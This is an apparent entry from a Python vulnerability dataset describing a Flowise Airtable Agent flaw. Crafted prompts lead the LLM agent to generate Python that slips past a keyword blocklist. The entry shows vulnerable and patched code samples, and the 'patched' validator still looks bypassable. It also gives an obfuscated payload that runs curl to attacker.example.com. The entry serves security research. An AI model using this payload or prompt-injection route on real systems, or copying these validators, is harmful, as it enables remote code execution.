CVE-2026-73485
Flowise Airtable Agent allows RCE via blocklist bypass in prompt.
- CVSS 9.0
- 94
- Input Validation and Sanitization
- Remote
Flowise before 3.1.3 contains a code injection vulnerability in the Airtable Agent node that allows unauthenticated attackers to execute arbitrary Python code by bypassing the pythonCodeValidator blocklist through obfuscation techniques. Attackers can send crafted prompts to a chatflow using the Airtable Agent node to inject malicious Python code that executes in an unsandboxed pyodide environment with full access to the host operating system.
- CWE
- 94
- CVSS base score
- 9.0
- Published
- 2026-08-13
- OWASP
- A03 Injection
- Orthogonal defect classification
- Checking
- Code defect classification
- Incorrect Check
- Category
- Input Validation and Sanitization
- Subcategory
- Command Injection
- Accessibility scope
- Remote
- Impact
- Arbitrary Code Execution
- Affected component
- Flowise
- Fixed by upgrading
- Yes
Solution
Upgrade Flowise to version 3.1.3 or later.
Vulnerable code sample
import re
import ast
# Insecure blocklist of keywords to prevent malicious code execution.
BLOCKLIST = [
'import', 'os', 'sys', 'subprocess', 'eval', 'exec',
'open', '__',
]
def pythonCodeValidator(code: str) -> bool:
"""
Validates the given Python code against a blocklist.
This method is insecure as it can be bypassed with obfuscation.
"""
# VULNERABLE: A simple string-based blocklist is easily bypassed by obfuscation.
for keyword in BLOCKLIST:
if keyword in code.lower():
return False
return True
class AirtableAgentNode:
"""
Represents a node that can execute Python code generated by an LLM
in response to a prompt, supposedly in a sandboxed environment.
"""
def execute_code_tool(self, generated_code: str):
"""
Executes the provided code string if it passes validation.
"""
if not pythonCodeValidator(generated_code):
raise ValueError("Disallowed Python code was detected.")
# The code is executed in an environment like pyodide.
# We use exec() here to represent the code execution sink.
exec(generated_code, {"__builtins__": {}})Patched code sample
import re
import ast
# The insecure blocklist is removed. Validation is now done via AST parsing.
def pythonCodeValidator(code: str) -> bool:
"""
Validates the given Python code by parsing it into an
Abstract Syntax Tree (AST) and checking for disallowed nodes.
"""
# FIX: The code is parsed into an AST and walked to disallow dangerous nodes.
try:
tree = ast.parse(code)
for node in ast.walk(tree):
if isinstance(node, (ast.Import, ast.ImportFrom)):
return False
# Check for dangerous attribute access like `__builtins__.__import__`
if isinstance(node, ast.Attribute) and node.attr in ('__import__', 'exec', 'eval'):
return False
except SyntaxError:
return False # Invalid Python code is not allowed
return True
class AirtableAgentNode:
"""
Represents a node that can execute Python code generated by an LLM
in response to a prompt, supposedly in a sandboxed environment.
"""
def execute_code_tool(self, generated_code: str):
"""
Executes the provided code string if it passes validation.
"""
if not pythonCodeValidator(generated_code):
raise ValueError("Disallowed Python code was detected.")
# The code is executed in an environment like pyodide.
# We use exec() here to represent the code execution sink.
exec(generated_code, {"__builtins__": {}})Payload
getattr(__import__(('o' + 's')), ('sys' + 'tem'))('curl https://attacker.example.com/pwned')
Cite this entry
@misc{vaitp:cve202673485,
title = {{Flowise Airtable Agent allows RCE via blocklist bypass in prompt.}},
author = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
year = {2026},
note = {VAITP Python Vulnerability Dataset, entry CVE-2026-73485},
howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2026-73485/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.
The supreme art of war is to subdue the enemy without fighting.
Sun Tzu – “The Art of War”
:: Shaping the future through research and ingenuity ::
